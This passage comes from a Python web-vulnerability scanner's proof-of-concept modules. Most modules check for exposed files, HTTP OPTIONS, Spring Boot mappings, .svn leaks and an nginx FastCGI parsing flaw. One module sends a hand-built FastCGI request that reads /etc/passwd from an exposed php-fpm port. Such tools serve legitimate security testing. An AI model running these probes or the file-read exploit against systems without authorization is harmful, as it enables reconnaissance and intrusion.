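            cprint("[+]存在web.xml配置文件...(敏感信息)\tpayload: "+vulnurl, "green")
            return True
        cprint("[-]不存在jsp_conf_find漏洞", "white", "on_grey")
        return False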
31 | 
32 | 
if __name__ == "__main__":
    # CLI usage: python jsp_conf_find.py <base-url>
    # Suppress all warnings, such as the TLS ones triggered by verify=False in run().
    warnings.filterwarnings("ignore")
    jsp_conf_find_BaseVerify(sys.argv[1]).run()
37 | 


--------------------------------------------------------------------------------
/POC_Scan/information/options_method.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: options方法开启
 5 | referer: unknow
 6 | author: Lucifer
 7 | description: 检测目标是否响应 HTTP OPTIONS 请求并在 Allow 头中列出 OPTIONS;按原样输出 Allow 头,便于人工确认是否开放了 PUT/DELETE/TRACE 等危险方法
 8 | '''
 9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 | 
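class options_method_BaseVerify:
    """Report whether the target answers ``OPTIONS`` with an ``Allow`` header listing it.

    ``OPTIONS`` itself is harmless; the value of this check is the ``Allow`` header
    it echoes, which is where dangerous methods (PUT, DELETE, TRACE, ...) would show
    up.  The verdict is only "OPTIONS is advertised" -- triage the header manually.

    Attributes:
        url: URL of the target; probed as-is (no path is appended).
        timeout: Per-request timeout in seconds handed to ``requests``.
    """

    USER_AGENT = "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"

    def __init__(self, url, timeout=10):
        self.url = url
        self.timeout = timeout

    @staticmethod
    def _looks_vulnerable(allow_header):
        """True when the ``Allow`` header value names OPTIONS (case-sensitive token)."""
        return "OPTIONS" in allow_header

    def run(self):
        """Send the OPTIONS request, print the verdict and return it.

        Returns:
            True when OPTIONS is advertised, False when it is not (or no ``Allow``
            header came back), None when the request itself failed.
        """
        vulnurl = self.url
        try:
            # verify=False is deliberate for a scanner (bad certs are common on targets).
            req = requests.options(vulnurl, headers={"User-Agent": self.USER_AGENT},
                                   timeout=self.timeout, verify=False)
        except Exception as exc:  # boundary: one broken target must not abort a batch
            cprint("[-] "+__file__+"====>可能不存在漏洞 ("+type(exc).__name__+": "+str(exc)+")", "cyan")
            return None
        # .get(): servers that answer without an Allow header used to raise KeyError,
        # which the old bare except reported as "maybe not vulnerable".
        allow = req.headers.get("Allow", "")
        if self._looks_vulnerable(allow):
            cprint("[+]存在options方法开启...(敏感信息)"+"\tpayload: "+vulnurl+"\tAllow:"+allow, "green")
            return True
        cprint("[-]不存在options_method漏洞", "white", "on_grey")
        return False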
34 | 
35 | 
if __name__ == "__main__":
    # CLI usage: python options_method.py <url>
    # Suppress all warnings, such as the TLS ones triggered by verify=False in run().
    warnings.filterwarnings("ignore")
    options_method_BaseVerify(sys.argv[1]).run()


--------------------------------------------------------------------------------
/POC_Scan/information/robots_find.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: robots文件发现
 5 | referer: unknow
 6 | author: Lucifer
 7 | description: robots.txt是爬虫标准文件,可从文件里找到屏蔽了哪些爬虫搜索的目录
 8 | '''
 9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 | 
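class robots_find_BaseVerify:
    """Report a ``/robots.txt`` that contains ``Disallow`` rules.

    This is reconnaissance, not a vulnerability: the disallowed paths hint at
    admin panels and other areas the operator did not want indexed.

    Attributes:
        url: Base URL of the target (scheme://host[:port][/path]).
        timeout: Per-request timeout in seconds handed to ``requests``.
    """

    PAYLOAD = "/robots.txt"
    USER_AGENT = "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"

    def __init__(self, url, timeout=10):
        self.url = url
        self.timeout = timeout

    def _target_url(self):
        """Build the probe URL without producing ``//`` when ``url`` ends in a slash."""
        return self.url.rstrip("/") + self.PAYLOAD

    @staticmethod
    def _looks_vulnerable(status_code, body):
        """True for a 200 body with at least one ``Disallow`` directive.

        The status check is new: the old test matched ``Disallow`` in any response,
        including custom 404 pages that happen to mention it.
        """
        return status_code == 200 and "Disallow" in body

    def run(self):
        """Send the probe, print the verdict and return it.

        Returns:
            True when a robots.txt with rules is served, False when it is not, None
            when the request itself failed.
        """
        vulnurl = self._target_url()
        try:
            # verify=False is deliberate for a scanner (bad certs are common on targets).
            req = requests.get(vulnurl, headers={"User-Agent": self.USER_AGENT},
                               timeout=self.timeout, verify=False)
        except Exception as exc:  # boundary: one broken target must not abort a batch
            cprint("[-] "+__file__+"====>可能不存在漏洞 ("+type(exc).__name__+": "+str(exc)+")", "cyan")
            return None
        if self._looks_vulnerable(req.status_code, req.text):
            cprint("[+]存在robots.txt爬虫文件...(敏感信息)"+"\tpayload: "+vulnurl, "green")
            return True
        cprint("[-]不存在robots_find漏洞", "white", "on_grey")
        return False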
32 | 
if __name__ == "__main__":
    # CLI usage: python robots_find.py <base-url>
    # Suppress all warnings, such as the TLS ones triggered by verify=False in run().
    warnings.filterwarnings("ignore")
    robots_find_BaseVerify(sys.argv[1]).run()
37 | 


--------------------------------------------------------------------------------
/POC_Scan/information/springboot_api.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: spring boot 路径泄露
 5 | referer: http://blog.csdn.net/u011687186/article/details/73457498
 6 | author: Lucifer
 7 | description: SpringBoot默认API会暴露出敏感接口
 8 | '''
 9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 | 
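class springboot_api_BaseVerify:
    """Detect an unauthenticated Spring Boot Actuator ``/mappings`` endpoint.

    The endpoint dumps every request mapping of the application, i.e. its full
    URL surface including internal/admin routes.

    NOTE(review): ``/mappings`` at the root is the Spring Boot 1.x actuator layout;
    2.x serves it under ``/actuator/`` with a different JSON shape, which this
    signature would not match -- confirm against the target's version.

    Attributes:
        url: Base URL of the target (scheme://host[:port][/path]).
        timeout: Per-request timeout in seconds handed to ``requests``.
    """

    PAYLOAD = "/mappings"
    USER_AGENT = "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"

    def __init__(self, url, timeout=10):
        self.url = url
        self.timeout = timeout

    def _target_url(self):
        """Build the probe URL without producing ``//`` when ``url`` ends in a slash."""
        return self.url.rstrip("/") + self.PAYLOAD

    @staticmethod
    def _looks_vulnerable(status_code, body):
        """True for a 200 body carrying both actuator mapping markers."""
        return (status_code == 200
                and "resourceHandlerMapping" in body
                and "springframework.boot.actuate" in body)

    def run(self):
        """Send the probe, print the verdict and return it.

        Returns:
            True when the mappings dump is readable, False when it is not, None when
            the request itself failed.
        """
        vulnurl = self._target_url()
        try:
            # verify=False is deliberate for a scanner (bad certs are common on targets).
            req = requests.get(vulnurl, headers={"User-Agent": self.USER_AGENT},
                               timeout=self.timeout, verify=False)
        except Exception as exc:  # boundary: one broken target must not abort a batch
            cprint("[-] "+__file__+"====>可能不存在漏洞 ("+type(exc).__name__+": "+str(exc)+")", "cyan")
            return None
        if self._looks_vulnerable(req.status_code, req.text):
            cprint("[+]存在spring boot api路径泄露...(敏感信息)"+"\tpayload: "+vulnurl, "green")
            return True
        cprint("[-]不存在springboot_api漏洞", "white", "on_grey")
        return False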
32 | 
33 | 
if __name__ == "__main__":
    # CLI usage: python springboot_api.py <base-url>
    # Suppress all warnings, such as the TLS ones triggered by verify=False in run().
    warnings.filterwarnings("ignore")
    springboot_api_BaseVerify(sys.argv[1]).run()
38 | 


--------------------------------------------------------------------------------
/POC_Scan/information/svn_check.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: svn源码泄露扫描
 5 | referer: unknown
 6 | author: Lucifer
 7 | description: 忘记了删除.svn目录而导致的漏洞。
 8 | '''
 9 | import re
10 | import sys
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 | 
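class svn_check_BaseVerify:
    """Detect a deployed ``.svn`` working-copy directory via ``/.svn/entries``.

    A readable ``.svn`` tree usually allows recovery of the full source, hence the
    high severity.  Redirects are not followed so a catch-all redirect to the
    front page cannot be mistaken for the file.

    Attributes:
        url: Base URL of the target (scheme://host[:port][/path]).
        timeout: Per-request timeout in seconds handed to ``requests``.
    """

    PAYLOAD = "/.svn/entries"
    USER_AGENT = "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
    # Tokens the original author looked for inside the form-feed separated records
    # of the entries file.  "file"/"dir" also occur in ordinary prose, so the body
    # is additionally required to be non-HTML (see _looks_vulnerable).
    ENTRY_PATTERN = re.compile(r'has-props|file|dir')

    def __init__(self, url, timeout=10):
        self.url = url
        self.timeout = timeout

    def _target_url(self):
        """Build the probe URL without producing ``//`` when ``url`` ends in a slash."""
        return self.url.rstrip("/") + self.PAYLOAD

    @classmethod
    def _looks_vulnerable(cls, status_code, body):
        """True for a 200, non-HTML body in which some ``\\x0c``-separated record matches.

        The previous loop called ``.group(0)`` on the result of ``search`` and so
        crashed (AttributeError) on the first non-matching record, aborting the
        whole check and printing a verdict for every record; the HTML guard rejects
        soft-404 and WAF pages that otherwise satisfy the loose pattern.
        """
        if status_code != 200 or "<html" in body.lower():
            return False
        return any(cls.ENTRY_PATTERN.search(record) for record in body.split('\x0c'))

    def run(self):
        """Send the probe, print the verdict and return it.

        Returns:
            True when an entries file is served, False when it is not, None when the
            request itself failed.
        """
        vulnurl = self._target_url()
        try:
            # verify=False is deliberate for a scanner (bad certs are common on targets).
            req = requests.get(vulnurl, headers={"User-Agent": self.USER_AGENT},
                               timeout=self.timeout, verify=False, allow_redirects=False)
        except Exception as exc:  # boundary: one broken target must not abort a batch
            cprint("[-] "+__file__+"====>可能不存在漏洞 ("+type(exc).__name__+": "+str(exc)+")", "cyan")
            return None
        if self._looks_vulnerable(req.status_code, str(req.text)):
            cprint("[+]存在svn源码泄露漏洞...(高危)\tpayload: "+vulnurl, "red")
            return True
        cprint("[-]不存在svn_check漏洞", "white", "on_grey")
        return False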
43 | 
44 | 
if __name__ == "__main__":
    # CLI usage: python svn_check.py <base-url>
    # Suppress all warnings, such as the TLS ones triggered by verify=False in run().
    warnings.filterwarnings("ignore")
    svn_check_BaseVerify(sys.argv[1]).run()
49 | 


--------------------------------------------------------------------------------
/POC_Scan/system/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/__init__.py


--------------------------------------------------------------------------------
/POC_Scan/system/__pycache__/__init__.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/__pycache__/__init__.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/__pycache__/__init__.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/__pycache__/__init__.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/__pycache__/systemmain.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/__pycache__/systemmain.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/__pycache__/systemmain.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/__pycache__/systemmain.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/iis/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/iis/__init__.py


--------------------------------------------------------------------------------
/POC_Scan/system/iis/__pycache__/__init__.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/iis/__pycache__/__init__.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/iis/__pycache__/__init__.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/iis/__pycache__/__init__.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/iis/__pycache__/iis_webdav_rce.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/iis/__pycache__/iis_webdav_rce.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/iis/__pycache__/iis_webdav_rce.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/iis/__pycache__/iis_webdav_rce.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/nginx/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/nginx/__init__.py


--------------------------------------------------------------------------------
/POC_Scan/system/nginx/__pycache__/__init__.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/nginx/__pycache__/__init__.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/nginx/__pycache__/__init__.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/nginx/__pycache__/__init__.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/nginx/__pycache__/multi_fastcgi_code_exec.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/nginx/__pycache__/multi_fastcgi_code_exec.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/nginx/__pycache__/multi_fastcgi_code_exec.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/nginx/__pycache__/multi_fastcgi_code_exec.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/nginx/multi_fastcgi_code_exec.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: nginx Multi-FastCGI Code Execution
 5 | referer: http://drops.wooyun.org/tips/2006
 6 | author: Lucifer,xiaokv
 7 | description: nginx解析漏洞,代码执行
 8 | '''
import sys
import warnings
from urllib.parse import urljoin, urlparse

import requests
from bs4 import BeautifulSoup
from termcolor import cprint
14 | 
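class multi_fastcgi_code_exec_BaseVerify:
    """Probe for the nginx + php-fpm path-parsing flaw (``/static.png/a.php``).

    Method: pick a static resource the site really serves (``robots.txt`` when
    present, otherwise an ``img``/``link``/``script`` URL scraped from the front
    page), fetch it once normally and once with ``/a.php`` appended.  When nginx
    hands the second request to PHP, the reply's Content-Type changes (for example
    ``image/png`` -> ``text/html``).

    Attributes:
        url: Base URL of the target (scheme://host[:port][/path]).
        timeout: Per-request timeout in seconds handed to ``requests``.
    """

    PAYLOAD = "/a.php"
    # (tag, attribute) pairs whose values reference static resources on the front
    # page.  The earlier code read ``src`` on <link> and ``href`` on <script>,
    # i.e. swapped, so neither ever yielded a candidate.
    STATIC_TAGS = (("img", "src"), ("link", "href"), ("script", "src"))

    def __init__(self, url, timeout=10):
        self.url = url
        self.timeout = timeout

    def _base(self):
        """Base URL with exactly one trailing slash so relative links resolve under it."""
        return self.url.rstrip("/") + "/"

    def _resolve_candidate(self, link):
        """Turn a scraped link into an absolute URL on the target, or None.

        Relative links resolve against the target base; links to another host
        (CDNs, protocol-relative ``//cdn...``, ``data:`` URIs) return None so the
        scan never probes out-of-scope hosts.  The earlier code tested the scheme
        of ``self.url`` instead of the link and always prefixed the base URL.
        """
        absolute = urljoin(self._base(), link)
        if urlparse(absolute).netloc != urlparse(self._base()).netloc:
            return None
        return absolute

    @classmethod
    def _static_links(cls, html):
        """Return raw img/link/script references from ``html`` (missing attrs skipped)."""
        soup = BeautifulSoup(html, "html.parser")
        links = []
        for tag, attr in cls.STATIC_TAGS:
            for node in soup.find_all(tag):
                value = node.get(attr)  # .get(): a tag without the attr is no longer fatal
                if value:
                    links.append(value)
        return links

    def catch(self, url):
        """Collect candidate resource URLs for ``url`` (public name kept for callers).

        Returns ``[<url>/robots.txt]`` when robots.txt is served with rules,
        otherwise the unresolved references found on the front page.
        """
        base = url.rstrip("/")
        robots_url = base + "/robots.txt"
        req = requests.get(robots_url, timeout=self.timeout, verify=False)
        if req.status_code == 200 and "Disallow" in req.text:
            return [robots_url]
        req = requests.get(base, timeout=self.timeout, verify=False)
        return self._static_links(req.text)

    @staticmethod
    def _looks_vulnerable(base_status, base_type, probe_status, probe_type):
        """Verdict for one resource: both fetches succeed and the Content-Type changed.

        Requiring 200 on the probe is new: when php-fpm refuses the request
        (``Access denied`` / 403, or a 404) the type differs too, and the earlier
        type-only comparison reported that as vulnerable.  A site whose soft-404 page
        answers 200 can still produce a false positive -- confirm manually.
        """
        return base_status == 200 and probe_status == 200 and base_type != probe_type

    def _probe(self, rurl):
        """Fetch ``rurl`` and ``rurl + PAYLOAD``; return ``(vulnurl, verdict)``."""
        vulnurl = rurl + self.PAYLOAD
        html = requests.get(rurl, timeout=self.timeout, verify=False)
        # The earlier code requested ``vulnurl + payload`` (payload appended twice).
        poc = requests.get(vulnurl, timeout=self.timeout, verify=False)
        return vulnurl, self._looks_vulnerable(
            html.status_code, html.headers.get("Content-Type"),
            poc.status_code, poc.headers.get("Content-Type"))

    def run(self):
        """Probe every candidate resource, print the verdict and return it.

        Returns:
            True on the first vulnerable resource, False when none is, None when the
            candidate collection itself failed.
        """
        try:
            links = self.catch(self.url)
        except Exception as exc:  # boundary: one broken target must not abort a batch
            cprint("[-] "+__file__+"====>可能不存在漏洞 ("+type(exc).__name__+": "+str(exc)+")", "cyan")
            return None
        # dict.fromkeys(): de-duplicate while keeping the page order.
        candidates = dict.fromkeys(c for c in map(self._resolve_candidate, links) if c)
        for rurl in candidates:
            try:
                vulnurl, hit = self._probe(rurl)
            except Exception:
                continue  # one unreachable resource must not end the check early
            if hit:
                cprint("[+]存在Nginx Multi-FastCGI Code Execution漏洞...(高危)\tpayload: "+vulnurl+"\t老大去找上传点吧~", "red")
                return True
        cprint("[-]不存在multi_fastcgi_code_exec漏洞", "white", "on_grey")
        return False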
73 | 
if __name__ == "__main__":
    # CLI usage: python multi_fastcgi_code_exec.py <base-url>
    # Suppress all warnings, such as the TLS ones triggered by verify=False in run().
    warnings.filterwarnings("ignore")
    multi_fastcgi_code_exec_BaseVerify(sys.argv[1]).run()
78 | 


--------------------------------------------------------------------------------
/POC_Scan/system/php/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/php/__init__.py


--------------------------------------------------------------------------------
/POC_Scan/system/php/__pycache__/__init__.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/php/__pycache__/__init__.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/php/__pycache__/__init__.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/php/__pycache__/__init__.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/php/__pycache__/php_expose_disclosure.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/php/__pycache__/php_expose_disclosure.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/php/__pycache__/php_expose_disclosure.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/php/__pycache__/php_expose_disclosure.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/php/__pycache__/php_fastcgi_read.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/php/__pycache__/php_fastcgi_read.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/php/__pycache__/php_fastcgi_read.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/php/__pycache__/php_fastcgi_read.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/php/php_expose_disclosure.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: php expose_php模块开启
 5 | referer: http://blog.csdn.net/change518/article/details/39892449
 6 | author: Lucifer
 7 | description: 开启了expose_php模块。
 8 | '''
 9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 | 
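class php_expose_disclosure_BaseVerify:
    """Check whether ``expose_php`` is on by requesting the PHP "easter egg" GUID.

    ``index.php?=PHPB8B5F2A0-...`` makes PHP render its credits page instead of the
    script when ``expose_php=On``; the two markers below are the ones the original
    author matched on that page.  NOTE(review): the easter eggs were dropped in
    later PHP 5.x releases, so a miss says little about current targets -- confirm.

    Attributes:
        url: Base URL of the target (scheme://host[:port][/path]).
        timeout: Per-request timeout in seconds handed to ``requests``.
    """

    PAYLOAD = "/index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000"
    USER_AGENT = "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"

    def __init__(self, url, timeout=10):
        self.url = url
        self.timeout = timeout

    def _target_url(self):
        """Build the probe URL without producing ``//`` when ``url`` ends in a slash."""
        return self.url.rstrip("/") + self.PAYLOAD

    @staticmethod
    def _looks_vulnerable(status_code, body):
        """True for a 200 body carrying both credits-page markers."""
        return status_code == 200 and "XMLWriter" in body and "phpinfo" in body

    def run(self):
        """Send the probe, print the verdict and return it.

        Returns:
            True when the credits page is rendered, False when it is not, None when
            the request itself failed.
        """
        vulnurl = self._target_url()
        try:
            # verify=False is deliberate for a scanner (bad certs are common on targets).
            req = requests.get(vulnurl, headers={"User-Agent": self.USER_AGENT},
                               timeout=self.timeout, verify=False)
        except Exception as exc:  # boundary: one broken target must not abort a batch
            cprint("[-] "+__file__+"====>可能不存在漏洞 ("+type(exc).__name__+": "+str(exc)+")", "cyan")
            return None
        if self._looks_vulnerable(req.status_code, req.text):
            cprint("[+]存在php expose_php模块开启...(信息)\tpayload: "+vulnurl, "green")
            return True
        cprint("[-]不存在php_expose_disclosure漏洞", "white", "on_grey")
        return False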
34 | 
if __name__ == "__main__":
    # CLI usage: python php_expose_disclosure.py <base-url>
    # Suppress all warnings, such as the TLS ones triggered by verify=False in run().
    warnings.filterwarnings("ignore")
    php_expose_disclosure_BaseVerify(sys.argv[1]).run()


--------------------------------------------------------------------------------
/POC_Scan/system/php/php_fastcgi_read.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: php fastcgi任意文件读取漏洞
 5 | referer: http://blog.sina.com.cn/s/blog_777f9dbb0102vadk.html
 6 | author: Lucifer
 7 | description: webserver为了提供fastcgi一些参数,每次转发请求的时候,会通过FASTCGI_PARAMS的包向fcgi进程进行传递。
 8 |             本来这些参数是用户不可控的,但是既然这个fcgi对外开放,那么也就说明我们可以通过设定这些参数,来让我们去做一些原本做不到的事情。
 9 | '''
10 | import sys
11 | import socket
12 | import warnings
13 | from termcolor import cprint
14 | from urllib.parse import urlparse
15 | 
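class php_fastcgi_read_BaseVerify:
    """Check for a php-fpm FastCGI listener that accepts requests from the network.

    A hand-built FastCGI request with ``SCRIPT_FILENAME=/etc/passwd`` is sent to the
    FastCGI port directly; if the reply carries passwd content, the daemon is
    reachable and executes whatever SCRIPT_FILENAME the client supplies (arbitrary
    file read on the host).

    Attributes:
        url: Either a URL (``http://host[:port]/...``) or ``host[:port]``.  When a URL
            carries an explicit port that port is probed, otherwise ``DEFAULT_PORT``;
            note that a URL's port is normally the web port, not the FastCGI one.
        timeout: Socket connect/read timeout in seconds.
    """

    DEFAULT_PORT = 9000
    # Raw request, decoded from the bytes: FCGI_BEGIN_REQUEST (id 1, role responder,
    # flags 0 = no keep-conn), one FCGI_PARAMS record (143 bytes + 1 padding byte)
    # holding REQUEST_METHOD=GET, SERVER_PROTOCOL=HTTP/1.1, DOCUMENT_ROOT=/,
    # REMOTE_ADDR=127.0.0.1, SCRIPT_FILENAME=/etc/passwd, SERVER_SOFTWARE="go / fcgiclient ",
    # then the empty FCGI_PARAMS record that terminates the parameter stream.
    FCGI_REQUEST_HEX = """
        01 01 00 01 00 08 00 00  00 01 00 00 00 00 00 00
        01 04 00 01 00 8f 01 00  0e 03 52 45 51 55 45 53
        54 5f 4d 45 54 48 4f 44  47 45 54 0f 08 53 45 52
        56 45 52 5f 50 52 4f 54  4f 43 4f 4c 48 54 54 50
        2f 31 2e 31 0d 01 44 4f  43 55 4d 45 4e 54 5f 52
        4f 4f 54 2f 0b 09 52 45  4d 4f 54 45 5f 41 44 44
        52 31 32 37 2e 30 2e 30  2e 31 0f 0b 53 43 52 49
        50 54 5f 46 49 4c 45 4e  41 4d 45 2f 65 74 63 2f
        70 61 73 73 77 64 0f 10  53 45 52 56 45 52 5f 53
        4f 46 54 57 41 52 45 67  6f 20 2f 20 66 63 67 69
        63 6c 69 65 6e 74 20 00  01 04 00 01 00 00 00 00
    """

    def __init__(self, url, timeout=6.0):
        self.url = url
        self.timeout = timeout

    def _parse_target(self):
        """Derive ``(host, port)`` from ``self.url``.

        URLs (anything containing ``://``) are split with urlparse; a bare
        ``host[:port]`` is split on the first colon.  An unparsable port in a URL
        falls back to DEFAULT_PORT (as before); in the bare form it raises
        ValueError, which run() reports.  ``://`` replaces the old ``"http" in url``
        test, which misrouted hostnames such as ``httpd.example.com``.
        """
        port = self.DEFAULT_PORT
        if "://" in self.url:
            host, _, port_text = urlparse(self.url).netloc.partition(":")
            if port_text:
                try:
                    port = int(port_text)
                except ValueError:
                    pass  # keep the FastCGI default, matching the earlier behaviour
            return host, port
        host, _, port_text = self.url.partition(":")
        if port_text:
            port = int(port_text)
        return host, port

    @classmethod
    def _fcgi_request(cls):
        """Return the request as bytes.

        The earlier code built a ``str`` with ``chr()`` and passed it to
        ``sock.send``, which raises TypeError on Python 3, so the check could never
        succeed; ``bytes.fromhex`` ignores the dump's whitespace (3.7+).
        """
        return bytes.fromhex(cls.FCGI_REQUEST_HEX)

    @staticmethod
    def _read_response(sock, limit=65536):
        """Read until EOF, a read timeout or ``limit`` bytes; data read so far is kept.

        The earlier single ``recv(1024)`` could truncate the reply before the
        markers; php-fpm closes the connection itself because keep-conn is off.
        """
        chunks, total = [], 0
        while total < limit:
            try:
                chunk = sock.recv(4096)
            except socket.timeout:
                break
            if not chunk:
                break
            chunks.append(chunk)
            total += len(chunk)
        return b"".join(chunks)

    @staticmethod
    def _looks_vulnerable(response):
        """True when the reply contains a passwd ``root:`` entry with a bash shell.

        NOTE(review): hosts whose root shell is not /bin/bash are missed; kept as the
        original author's signature.
        """
        return "root:" in response and "/bin/bash" in response

    def run(self):
        """Connect, send the request, print the verdict and return it.

        Returns:
            True when /etc/passwd content came back, False when it did not, None when
            the target could not be parsed, reached or read.
        """
        try:
            host, port = self._parse_target()
            # The with-block closes the socket on every path (the old code leaked it
            # when an exception escaped before sock.close()).
            with socket.create_connection((host, port), timeout=self.timeout) as sock:
                sock.sendall(self._fcgi_request())
                raw = self._read_response(sock)
        except Exception as exc:  # boundary: one broken target must not abort a batch
            cprint("[-] "+__file__+"====>可能不存在漏洞 ("+type(exc).__name__+": "+str(exc)+")", "cyan")
            return None
        # errors="replace": FastCGI framing bytes are not valid UTF-8 and used to
        # raise UnicodeDecodeError on a successful read.
        ret = raw.decode("utf-8", errors="replace")
        if self._looks_vulnerable(ret):
            cprint("[+]存在php fastcgi任意文件读取漏洞漏洞...(高危)\tpayload: "+host+":"+str(port), "red")
            return True
        cprint("[-]不存在php_fastcgi_read漏洞", "white", "on_grey")
        return False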
71 | 
if __name__ == "__main__":
    # CLI usage: python php_fastcgi_read.py <url-or-host[:port]>
    # Suppress all warnings before the probe runs.
    warnings.filterwarnings("ignore")
    php_fastcgi_read_BaseVerify(sys.argv[1]).run()
76 | 


--------------------------------------------------------------------------------
/POC_Scan/system/ssh/__init__.py:
